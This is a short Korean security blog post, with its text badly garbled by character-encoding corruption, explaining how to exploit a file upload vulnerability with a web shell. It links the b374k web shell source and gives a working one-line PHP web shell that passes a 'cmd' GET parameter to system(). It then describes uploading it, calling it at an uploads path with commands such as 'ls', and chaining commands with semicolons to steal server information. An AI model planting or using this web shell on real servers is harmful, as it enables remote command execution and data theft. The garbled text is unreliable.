IT & Security/Web ํ์ผ์ ๋ก๋ ์ทจ์ฝ์ - ์น์ - ๋ฐ์ํ ํ์ผ ์ ๋ก๋ ์ทจ์ฝ์ ์ด ์๋ ๊ณณ์ด๋ผ๋ฉด ๊ฐ๋ฅ. ์ค๋ฌด์์๋ b 374k ๊ฐ์๊ฑฐ ์ฐ๋ฉด ์กํ๊ฐ๋ฏ๋ก ํ์ค์ง๋ฆฌ๋ก ์น์ ์ทจ์ฝ์ ์ ์ฐพ์๋ณด์. https://github.com/tennc/webshell/blob/master/php/b374k/source/b374k-2.8.source.php 1. ์๋ ํ์ผ์ php๋ก ๋ง๋ค์ด ๋๋๋ค. <?php system($_GET['cmd']); ?> 2. phpํ์ผ์ ์์ฑํ๋ค๋ฉด ์ฌ๋ฆฐ ip/uploads/a.php ๋ผ๋ ๊ณณ์ผ๋ก ์ ๊ทผํ๊ณ cmd์ ์ ๊ทผ ํ ๊ฒ์ด๋ฏ๋ก ?cmd = ls ์ด๋ฐ์์ผ๋ก ๋ช ๋ น์ด๋ฅผ ์จ์ค๋ค php๋ get๋ฐฉ์์ผ๋ก cmd๊ฐ์ system์ ๋๊ฒจ์ฃผ๊ณ ์์ด์ ๋ช ๋ น์ด ์ฑ๊ณต์ ์ผ๋ก ๋จนํ๋ค. ์น์ ok ์๋ฒ ์ ๋ณด ํ์ทจ ๋ช ๋ น์ด๋ฅผ ์ด์ผ๋ ค๋ฉด ์ธ๋ฏธ์ฝ๋ก ; ์ผ๋ก ์ด์ด์ฃผ๋ฉด ๋จ ๋ฐ์ํ ๊ณต์ ํ๊ธฐ URL ๋ณต์ฌ์นด์นด์คํก ๊ณต์ ํ์ด์ค๋ถ ๊ณต์ ์์ค ๊ณต์ ๊ฒ์๊ธ ๊ด๋ฆฌ ๊ตฌ๋ ํ๊ธฐI-Tstory Contents ๋น์ ์ด ์ข์ํ ๋งํ ์ฝํ ์ธ mobaxterm ์ฌ์ฉํ๊ธฐ 2020.09.15 chcp ์๋์ฐ ํ๊ธ๊นจ์ง ํด๊ฒฐ 2020.09.10 Stored XSS ์ค์ต 2020.08.25 ์ธ์ฝ๋ฉ(ascii, html, url, base 64 ..) 2020.08.23 ๋๊ธ 0 + ์ด์ ๋๊ธ ๋๋ณด๊ธฐ